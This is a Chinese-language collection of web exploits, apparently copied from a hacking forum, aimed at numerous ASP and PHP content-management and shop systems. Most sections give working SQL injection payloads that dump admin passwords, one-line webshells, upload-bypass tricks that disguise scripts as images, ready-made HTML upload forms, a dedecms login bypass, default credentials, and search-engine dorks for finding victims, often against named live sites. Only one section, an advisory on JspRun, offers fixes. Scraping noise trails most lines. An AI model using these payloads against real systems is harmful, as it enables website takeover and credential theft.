启航企业建站系统 cookie注入漏洞通杀所有版本5 [! Q* v( O. F1 I
7 l1 ]8 K X4 L直接上exploit:
. V2 M5 Z, E* L [3 O* Vjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));2 D+ Q4 h7 g% C8 O- v- [
test:http://www.tb11.net/system/xitong/shownews.asp?id=210! E, a( ~6 R$ x- z8 r! {; L
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 T7 a1 ?0 _( {: e
Asprain论坛 注册用户 上传图片就可拿到webshell
3 q" i: b2 k; @7 Z/ Q6 P
% s+ m9 j. I6 \3 `Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
+ @6 l, ^* C$ O J* K( ?: {) y1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
8 i" p0 I' [( m* `8 G; \2.gif 为一小图片文件,一定要小,比如qq表情图片) _ m" p1 r& ~: C
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用) @# m! h6 J9 m2 o
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了" d9 j2 |3 [, u; X* O3 a
5.q.asp;.gif4 X4 F: F3 H5 m# P' ^8 {. h# X) j( N
google:Powered by Asprain6 U5 X6 `, R5 e, \9 Z+ x$ F
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 r2 n- u: v& d5 } z6 @0 f' o+ y) X2 }3 ^4 m
ShopNum1全部系统存在上传漏洞。& G, y- X }4 J3 n5 X# L2 A
+ _. n. K9 [7 b. d4 b5 `" o* l
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。0 ^9 h) K: G. ~" S2 s
按说明 提示登录后台。。
e, P6 u+ ^! P. v% B, z9 j在后台功能页面->附件管理->附件列表
1 x, u: T0 P, |- r) c可以直接上传.aspx 后缀木马
0 W/ x' h+ a, i; H: ^* Jhttp://demo.shopnum1.com/upload/20110720083822500.aspx
$ V2 j Z3 C4 p; e--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& ?$ l$ d; _! @( e4 v
- O# Y& A% ^/ c. ^* q' r
牛牛CMS中小企业网站管理系统 上传漏洞
9 w/ I6 G" e/ ]6 k
6 H: c I% H1 K' @2 v) K! H" T牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
8 A3 W8 ?& C# L+ N* W后台:admin/login.asp9 O. f0 H q! G' [
ewebeditor 5.5 Nday
( o4 k. h' t( C0 ^1 a8 f7 Y z$ Kexp:6 w( [* m' i! e
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">? n9 S# I5 W5 B# g2 D) [
<input?type=file?name=uploadfile?size=100><br><br>?4 f* M V8 o N) O6 y" y; t( x1 C
<input?type=submit?value=upload>?" W- m7 b9 y2 H' r$ e2 l) V& h+ m
</form>8 w2 O1 v7 `, [! B; i
ps:先上传小马.- y1 d8 a( h$ J3 x8 Q: r N
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
+ q& e/ U3 s! w7 _- W/ m
$ ]* K! |8 l$ o9 g' D--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# @- Q9 C' I4 h) m5 ?( r1 O. q3 ?1 ~( |+ T5 B A# [$ ?# P
YothCMS 遍历目录漏洞/ v+ @: f3 w" {- h
8 [8 y& B8 t! K" V3 S
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。+ `+ U$ v) w1 e+ V& i/ [ e
默认后台:admin/login.asp
! o% h# l2 M! V. _- n0 I8 N: e遍历目录:
- Q7 b6 Y* S% _2 ^2 Jewebeditor/manage/upload.asp?id=1&dir=../6 w7 x' a7 j6 N b' d& `1 n3 I- U
data:: _+ A S" Q8 ^: m! P$ `0 I! [
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa: }# k/ c0 f9 k
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 [( y, A0 q- l V3 Q- R' {5 E# @/ x
4 Y, O7 f/ o; h! z- {2 K- q
Net112企业建站系统 1.0
8 h- a) X. z; i5 F
# T8 w6 b3 {/ _9 Y m4 a! O源码简介:
: K% A4 M8 {8 P* H" JNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。! Q, Z8 V& Y3 b. D9 @/ i$ P8 m
添加管理员:
1 L2 T4 K* Q) }3 nhttp://www.0855.tv/admin/admin.asp?action=add&level=2) @; a7 T9 e' K; p! y! t
其实加不加都不是很重要,后台文件都没怎么作验证。
4 K M/ ^7 o8 R! n$ K上传路径:! k- O( Y" S8 w$ R0 Y- z) E
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200( B7 f- }2 m8 S& [& o1 e8 u
http://www.0855.tv/inc/Upfile.asp?Stype=2: q3 ?. b. v7 h- t6 I9 u$ d
怎么利用自己研究。: n' U# _! v/ g" l5 C% j
遍历目录:% J. J. N7 C) {) g3 \9 C8 `7 Z* ]: T
http://www.0855.tv/admin/upfile.asp?path=../..
6 @; D) k5 v) L4 Q如:
- U" p, A3 ]: F, z) ihttp://www.0855.tv/admin/upfile.asp?path=../admin
8 s% J1 Y5 P& S2 ?1 M7 r% m5 _http://www.0855.tv/admin/upfile.asp?path=../data# t) D2 p4 t2 f* m2 ~# f8 T# P! G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: `2 d1 P) x1 ]7 X" M6 L; k: x
3 M9 z: u% X: `- K, e8 [: K$ ?( }
易和阳光购物商城通杀 上传漏洞) K) y# x8 b4 }6 L# ^3 ^0 ~. ~
% X8 f# Y- e# h& ^1 z9 n! N
前提要求是IIS6.0+asp坏境。. j+ Q, i& [0 q" f S5 W
漏洞文件Iheeo_upfile.asp
% R" U6 D) R$ G6 j! S过滤不严.直接可以iis6.0上传
; t9 y' z% B- I9 R; A5 Z0 ^8 e" a把ASP木马改成0855.asp;1.gif8 M# e. }/ B$ K$ {% d" d3 R. y
直接放到明小子上传& f3 U& t& o( G/ U& H6 M$ C1 h+ Z
Google搜索:inurl:product.asp?Iheeoid=
% U! @9 E0 t4 {. }$ U--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 w, n8 `+ P( ~) _! U3 a0 I, n! J4 N4 ^' l" w2 I! U
phpmyadmin后台4种拿shell方法8 X1 Q4 ]5 E; ~5 @% u3 o' @9 N5 N
& S3 |! J3 p7 k9 p! t6 V1 K# X
方法一:$ s4 Z! l% ]1 a1 |# C
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );, {% Y8 O {3 A o" u
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');5 l& J+ Q- M9 I+ y, o2 U
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';$ k2 N5 |4 L" o+ T& D/ \- ]8 Q
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
9 @" e# U" D5 c6 g! H% [1 k/ H一句话连接密码:xiaoma
) }! m& \# l5 n2 e8 b# k1 _方法二:
! w+ |: B$ x& }9 q3 w" {" ^Create TABLE xiaoma (xiaoma1 text NOT NULL);
2 o% {7 T, |6 m% s9 C' \/ qInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');0 E/ |6 }3 g, N3 z7 H1 F w: X
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';8 H, |2 c) I, N4 J$ n0 o: `
Drop TABLE IF EXISTS xiaoma;
3 {# f5 \/ W: D) \! u) q6 I方法三:
* U8 E" @' P2 d8 l+ x! P: N读取文件内容: select load_file('E:/xamp/www/s.php');
9 i; d& {7 b0 x; f' O1 S; I写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
5 U2 z. r3 W6 U0 A0 ycmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'! ] b" o! i3 G
方法四:
& O0 _% n) ^% Z/ Uselect load_file('E:/xamp/www/xiaoma.php');
" ]) Y' t5 ?2 _8 t" _% iselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
; \0 }" M9 ^, S, n然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir9 e j j ^( P$ C: _1 l! Z1 k
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 T; M: C( n8 K7 c5 W
% K$ X' K0 I' h4 D4 c. U: g传信网络独立开发网站源码0day漏洞7 N# Q3 A8 |' `0 Z
; @/ e' k$ A B7 @. Q/ u/ A; O
后台system/login.asp( g6 \, Q2 T% U/ G; g* q) L |5 S
进了后台有个ewebeditor
% e! Y' q; i: {: Z$ K- r$ ~Google 搜索inurl:product1.asp?tyc=
7 Z$ R! L4 b$ ]编辑器漏洞默认后台ubbcode/admin_login.asp) m- Z$ v. b9 W" c2 }5 D5 Z
数据库ubbcode/db/ewebeditor.mdb8 Q- M8 e& x" S, O& n
默认账号密码yzm 1111116 x7 G. I1 M) D- f" y# i4 V5 V
* I- k l& q; b
拿webshell方法4 E5 V% D+ ~5 F, {/ S# |& E
登陆后台点击“样式管理”-选择新增样式 2 W: y) y+ a2 J" H
样式名称:scriptkiddies 随便写
" H# c$ \0 p) ?9 H路径模式:选择绝对路径
w0 ~/ L+ C. d8 N8 w9 m, S图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx) h% P6 }9 @2 `' q& ?" ~
图片类型比如就是我们要上传的ASP木马格式
1 [7 F- m; y" w0 `0 K+ H上传路径:/
- _0 p% a A6 @$ `, \/ k) U0 E图片限制:写上1000 免的上不了我们的asp木马
4 z/ z, P# [$ s0 ], Q上传内容不要写
# {- v- u9 _+ Y/ E7 k6 q- G可以提交了 & H# w* \( B* x* r
样式增加成功! ( U0 w' O' i O) G& }& o
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 4 j: k7 `% b% ^* H
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置5 w* r6 [- x. T" |
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies. j( s5 l4 t# \, K. I5 v
上ASP木马 回车 等到路径) n/ n, c3 V1 }8 D. b8 d6 @
9 `' e) Q& k2 w3 c- D; z后台:system/login.asp
9 w4 _' c, a* A' oExp:9 F3 @ t8 O* x
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
) e% J/ g4 J/ p1 {测试:
, q$ _) H' [. [) c% {http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
6 z$ m4 i" j2 x/ p( V/ Q$ khttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
# a) V+ [* J$ j. _9 n1 a& |4 [, X--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# r! ^, F. J! p+ E
$ D7 W4 n, _ y$ \foosun 0day 最新注入漏洞( u( b5 S. C/ e. z" P; L5 `
& Z% ]0 d- N8 O" }% W漏洞文件:www.xxx.com/user/SetNextOptions.asp7 u1 [" ]4 u5 x
利用简单的方法:
3 ?3 ~2 u6 G) R2 B$ n暴管理员帐号:+ ^0 G/ o4 O0 p1 ~$ D' p
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin& S, {+ j- s1 }9 ], g+ I
暴管理员密码:* E0 X* P' I* f) v0 Q0 U7 {
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,3 E* l- R% y; z% i5 o* t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ A& ?9 J! @( B( C7 {3 H! H9 ]' K2 l; ^
网站程序的版权未知!% O3 s- \& g& D0 b$ Q
- [8 S" J4 E2 V+ ` \
默认网站数据库:; Y9 n: V/ c. x1 L0 G
www.i0day.com/data/nxnews.mdb. d6 A. i( d6 c* Y8 A
ewebeditor 在线编辑器:
z2 s) }6 U9 b5 I+ b编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb. m# ~5 z( B" R1 k3 `
登录地址:ewebeditor/admin_login.asp) S$ k4 ]" }9 q% ]" Q9 U
默认密码:admin admin
* d y4 R5 l$ b登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
- }' J* z8 a0 s" f
! L4 y! F* k, j2 n0 O) L) LSql注入漏洞:! Z/ k4 L' ^; O5 i+ X& O/ c
http://www.i0day.com/detail.asp?id=12
- C" t, g7 J6 X- F# Kexp:% X8 L4 [5 l/ a7 `
union select 1,admin,password,4,5,6,7,8 from admin
+ e* _' W" M& y: c) d+ k& t爆出明文帐号/密码
- G6 W. u1 t( w5 k3 z5 M: u4 J
5 a4 O- q$ T0 X: B0 [9 c8 t上传漏洞:5 n: _' @' `* U% i4 o9 p( r! K2 j
后台+upfile.asp6 R7 ^6 k) F; a& }0 H1 n9 ]
如:# e1 W6 ?: G/ ~+ Z, R. P2 |
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
$ M7 R& R: N8 A! z* c" M6 O, _shell的地址:网址+后台+成功上传的马. }' f C+ O, {* k
google:inurl:news.asp?lanmuName=
! ]9 I- W2 D& T8 N2 w; @2 o------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" H- m6 [6 x+ Y) o9 h4 O/ l( o' D4 e7 y
dedecms最新0day利用不进后台直接拿WEBSHELL! b5 E7 _$ E7 X' O$ |
* T) G+ c2 C* t$ |6 B/ l1 l( b拿webshell的方法如下:
" [- a, i* P: D$ m/ R5 z% @网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.% G1 x' x5 T6 e* M$ j
前题条件,必须准备好自己的dede数据库,然后插入数据:
3 T) d4 D/ l9 ^/ Sinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); % m, k3 g! U# M0 h& [$ x
/ ?- Y# b6 p( ^; A- b; `4 J
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
; m4 p- {8 E6 J' O2 u5 r1 \9 V/ K<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">+ q) O9 K2 H7 R+ ^9 U
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
# M r4 l9 h+ f1 B<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
& H& @- @( e* f1 I5 j% D4 n<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
$ J0 p1 Y% _- I9 f1 V1 @<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />2 @- v) A: h4 }7 _
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
* {, _8 w$ M# S* x<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
! i5 E& S" p% }. |- {+ r<input type="text" value="true" name="nocache" style="width:400">
+ a9 J5 z* T2 m2 v<input type="submit" value="提交" name="QuickSearchBtn"><br /> K4 O7 _# h! W( _, @/ e) k
</form>. m; j2 q W$ C! `; p: ^1 w: m: }
<script>- i- D' x( g% S1 I$ W
function addaction()
( L3 e9 u' j' w{( f3 d' I) h$ n7 \% b* M. U v
document.QuickSearch.action=document.QuickSearch.doaction.value;# j' ^& H; l% G$ r
}
$ g- g0 w$ g0 W7 P3 l</script>2 c! X4 J- C* i t
-----------------------------------------------------------------------------------------------------------------------------------------------
9 O2 ^7 O6 r2 b& M3 \( L3 ~& ]6 o1 e5 t2 W# J, @! R* B* X
dedecms织梦暴最新严重0day漏洞! ^* h1 B Z" S" g
bug被利用步骤如下:
) @4 N+ S9 \& `2 y3 ghttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
! Y8 n% S- [3 b9 P9 L把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
+ U5 }! `$ v7 k A% n-------------------------------------------------------------------------------------------------------------------------------------------" y5 V) Y' J; `/ y3 M* s4 P5 w8 ~8 h; I
" K5 t9 o& B6 {" C多多淘宝客程序上传漏洞
Y' S+ `6 O. _* x漏洞页面:
" P. W0 a: W5 q# `% y3 }4 Iadmin\upload_pic.php2 P7 W6 `+ {* t: h+ `; g
传送门:0 c l6 W( W) u' v- q/ \' i
http://www.www.com/admin/upload_pic.php?uploadtext=slide1: p* L) x X3 M! }. F
PS:copy张图片马 直接 xxx.php 上传抓包地址!0 P) W" g! e }
------------------------------------------------------------------------------------------------------------------------------------------------------
, @, E5 \! w1 r o( S8 C/ H' ]# ?" s0 v# t2 ^8 S$ g" N
无忧公司系统ASP专业版后台上传漏洞' _( @9 @8 Y1 W' t% \ ~
漏洞文件 后台上传
6 y$ P; t. E8 j6 k' Jadmin/uploadPic.asp, u# X: @( T- _
漏洞利用 这个漏洞好像是雷池的' } ~4 C# q) [3 F; s
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1' ^9 C2 \; i. R) x& P0 q4 R5 h
等到的webshell路径:; l) V; t6 T, \, b: {7 y% Y, S
/UploadFiles/scriptkiddies.asp;_2.gif1 s1 v' Q7 Z: g/ x, j" D+ ~
---------------------------------------------------------------------------------------------------------------------------------------------------
, C# }* O8 S7 k' w* A* a c- ]$ J2 _
住哪酒店分销联盟系统2010
! n9 x# a7 J$ _% n2 [/ E( J0 aSearch:7 j# i j1 h6 F+ R2 D) I+ d
inurl:index.php?m=hotelinfo
: U0 Y' U4 W4 T, N$ `" f) N9 Lhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
8 N+ z0 U/ D' I9 ]默认后台:index.php?m=admin/login
5 i( h* s. ~ N1 a. ]! I1 A--------------------------------------------------------------------------------------------------------------------------------------------------3 b" Z) ]3 X% T5 l; E
8 A7 n7 H- T" R s* w, d+ w
inurl:info_Print.asp?ArticleID=( }4 Q& e0 _+ b# M
后台 ad_login.asp
/ G9 e5 S6 u( X( k爆管理员密码:
$ D0 E3 ~7 }* d5 x2 L; _union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
; t3 ~3 ~: y' B, _" n------------------------------------------------------------------------------------------------------------------------------------------------------------
( `; U: M0 w5 L* g/ U
4 M; R- w5 O2 D- m0 |搜索框漏洞!3 `7 S% ^; n5 z' f* K% r8 s
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='- q/ o2 x* R: N+ R, e" m! S- t9 W
--------------------------------------------------------------------------------------------------------------------------------------------------------: e. ~ E) r2 R7 n
1 O" W5 X9 K( J* z% T5 ~* t2 P6 E关键字:
& W+ s4 K! k! o3 j1 Cinurl:/reg_TemletSel.asp?step=2) y( R4 G: U: ]5 k
或者, G" ^8 Y& w# D7 ]4 g
电子商务自助建站--您理想的助手
; c) n7 }+ H: l/ w! p; ^-------------------------------------------------------------------------------------------------------------------------------------------------
' H+ Y8 \7 H4 G# L4 | ~5 ]# |1 k8 I+ F. S H3 J+ e8 J
iGiveTest 2.1.0注入漏洞! |4 q3 O9 r" M; L7 z" ~
Version: <= 2.1.0
0 T3 A; U! X, {& q6 X5 Z8 c2 ]# Homepage: http://iGiveTest.com/$ W+ ]8 K8 u7 _1 ]
谷歌关键字: “Powered by iGiveTest”/ } o9 B* ~7 n' S
随便注册一个帐号。然后暴管理员帐号和密码5 U- L. b$ X4 M
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
' s. Q/ {( j+ J' M" Q: e/ B------------------------------------------------------------------------------------------------------------------------------------------------
9 n3 Z, ?; `$ L
+ d1 N. I: C% C9 ICKXP网上书店注入漏洞+ P/ d! Y6 ?+ u6 t% M& r8 K5 v* J
工具加表:shop_admin 加字段:admin2 z% ?% m5 l7 }1 R1 T0 `
后台:admin/login.asp
, X' L9 Z& o, B% Y7 W登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/' h3 t; \9 W8 \( c I
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
0 X2 M* ]6 S9 |; F- A# P+ p( N# ^--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 v- P) G' [0 M8 u) r' g5 v8 w; T; Z+ b% P6 z8 l. \5 J' _
段富超个人网站系统留言本写马漏洞
* h: u; O6 C* l源码下载:http://www.mycodes.net/24/2149.htm
o- k7 Y4 C/ n |5 e; J: m5 daddgbook.asp 提交一句话。
, c+ Q5 m c5 a+ b连接: http://www.xxxx.tv/date/date3f.asp2 X! v' O1 M# u5 z" V
google:为防批量,特略!2 q) r, H: T! R) b# O9 B/ ~; p1 K
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% I6 K7 @4 Q4 A {% `9 T
' V# Y! `' q) J6 m2 H2 Q8 B# O$ X \, e智有道专业旅游系统v1.0 注入及列目录漏洞
6 H# N5 C/ n4 l; o s* H默认后台路径:/admin/login.asp
8 y& h, F# I6 y' p默认管理员:admin
; W1 ^4 I5 S* l* y& {- D# V默认密码:123456& B+ K+ C# Q! b' ]% V9 l! I7 E
SQL EXP Tset:
$ o1 J# h7 g9 S: P2 Nhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin# e$ G {' ~( M8 g" Q5 s
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% S3 V1 X. A _5 b! {; K j' [! O7 L! {! [" P' B. H6 t( A1 l
ewebeditor(PHP) Ver 3.8 本任意文件上传0day% v P4 F2 q6 e
EXP:! L8 G" q+ l" r2 E2 Q* l, Q" \# @. y
<title>eWebeditoR3.8 for php任意文件上EXP</title># \) U# A2 R# d
<form action="" method=post enctype="multip. b5 L( X8 g8 M, g& I8 y0 l
art/form-data">
! H! B, @" k( l8 ?2 l% p6 N<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> & M. H: k W- y& h4 e9 M4 n9 G! @7 D
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
( y' c) w6 B/ J0 e4 J: c1 _<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
1 i8 O. h% M6 n" e4 s% s8 T5 c, lfile:<input type=file name="uploadfile"><br>
6 |1 b0 L$ R* z7 l<input type=button value=submit onclick=fsubmit()> 4 r. `+ z7 w" v! M* t
</form><br> 8 A. L0 }: I8 E2 E& H* N& ^1 g2 i
<script>
" J }6 s o5 e {! mfunction fsubmit(){ 7 @+ |9 o% k1 `5 z1 k
form = document.forms[0]; 4 q1 v2 @5 G; @3 g) W0 t# N- j
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; * a; ?* U3 u' E. M4 x
alert(form.action);
/ D1 t2 i8 _2 S$ h( M: bform.submit(); ; i4 w5 e* d+ u8 m; y. r/ r4 F
} 2 G; \$ Q# o ?$ u* x1 j0 C+ Y
</script>, [* V0 k9 |& I; P! N4 J6 X; E
注意修改里面ewebeditor的名称还有路径。4 w1 M- t( Z6 C# s, c8 Z
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------; V& c+ I2 y; p9 H$ X/ m- f
0 y: t1 @. E+ j, z3 s
提交’时提示ip被记录 防注入系统的利用2 F; l( y3 a1 z& y b) p" ?% U
网址:http://www.xxx.com/newslist.asp?id=122′! q% i: @) {4 G% i
提示“你的操作已被记录!”等信息。, z* Z) l# T$ _
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。1 q$ D; `1 d) c9 E
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 f9 x, @7 R2 v( i0 k7 U* N0 Q& C$ J: R7 e
西部商务网站管理系统 批量拿shell-0day& Q: s. V& B4 d: | T
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb $ B4 R( V# [. ~" v( a8 t- H7 T
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛. o0 u( C" N& t, H X! G0 q
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合* s2 }; |# r( r" m i7 _- N
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂0 u" n* e( J ~4 d: g0 q
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 U+ C( N) ~/ P& a3 d& Q6 K ~% V* b( E6 ]
JspRun!6.0 论坛管理后台注入漏洞
& S/ r9 C* c7 `; _/ k% \) t" ]8 X0 N; e7 v2 D2 i6 W% n# X/ n, \
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
: Q. Y# @# h3 T. A, |/ [4 JJspRun!6.0 . T) G4 O- ^+ f6 L
漏洞描述:$ B" I) u" \' R) V/ F. r& \0 V
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。6 a# y1 N9 G9 H
在处理后台提交的文件中ForumManageAction.java第1940行" g& o, W! K0 b1 V+ |/ u4 O4 f
String export = request.getParameter("export");//直接获取,没有安全过滤. y3 I9 |! ^+ m) I- o. _: P$ k
if(export!=null){6 k; N$ D4 h, H) S
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
$ l6 S9 p' d7 U+ \# G/ d$ lif(styles==null||styles.size()==0){
" a# R' ]+ z7 U1 i<*参考5 |/ [5 n, _% l4 w7 x* w( q) u
nuanfan@gmail.com
7 D7 P, c9 S; x+ P$ Y*> SEBUG安全建议:8 @ A* v6 n% i; J& I: G) P
www.jsprun.net6 Y/ w/ ]9 x8 ~, v# t
(1)安全过滤变量export! C* ?' q. }5 H) F( y
(2)在查询语句中使用占位符
) F/ c3 x' [0 x. w& Q& d------------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ Y+ o$ E/ c1 Z- _' t2 ~* [
) q) H. u3 X" |. {3 f" X6 M3 y
乌邦图企业网站系统 cookies 注入
; k% q- \+ {9 a6 a# ^5 _- L3 ^. c9 k4 S G4 T7 ~! G
程序完整登陆后台:/admin/login.asp
' g, J& T8 n, w默认登陆帐号:admin 密码:admin888
- U& {$ T; S: t. [" t& n& S语句:(前面加个空格)! u! U9 ]# f" d* p( D: ~9 i- `* C
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin5 q5 [, g: T- E( G/ X
或者是16个字段:0 S, j6 Z6 L% D$ _7 \; s
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin! ~% Q! ^2 `6 U+ N/ N8 o. y& n* y
爆不出来自己猜字段。
' k, h- B' o. t0 [注入点:http://www.untnt.com/shownews.asp?=88
- z5 s1 w% U `( I: }getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
4 g) n4 H* E: |. N- @& F+ D关键字:( b+ r$ J6 g ^1 k
inurl:shownews?asp.id=" o" U! C8 {8 r& c( |2 R4 j
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------" i7 `; a, x/ T# {0 [
: V; S1 [" P1 d7 \! D; oCKXP网上书店注入漏洞- e) T% K9 z* ]: x
7 F' d3 b) ]- ?( L% }工具加表:shop_admin 加字段:admin
6 m( ~- n; S5 g; Z0 q" w& A后台:admin/login.asp
& L" L" }/ ?0 O% x, [. s E1 R登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/9 b9 ^6 h8 n6 C2 ]7 K# R' s
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
, ^8 i6 T( o S5 {---------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 g% |& Q/ P3 }
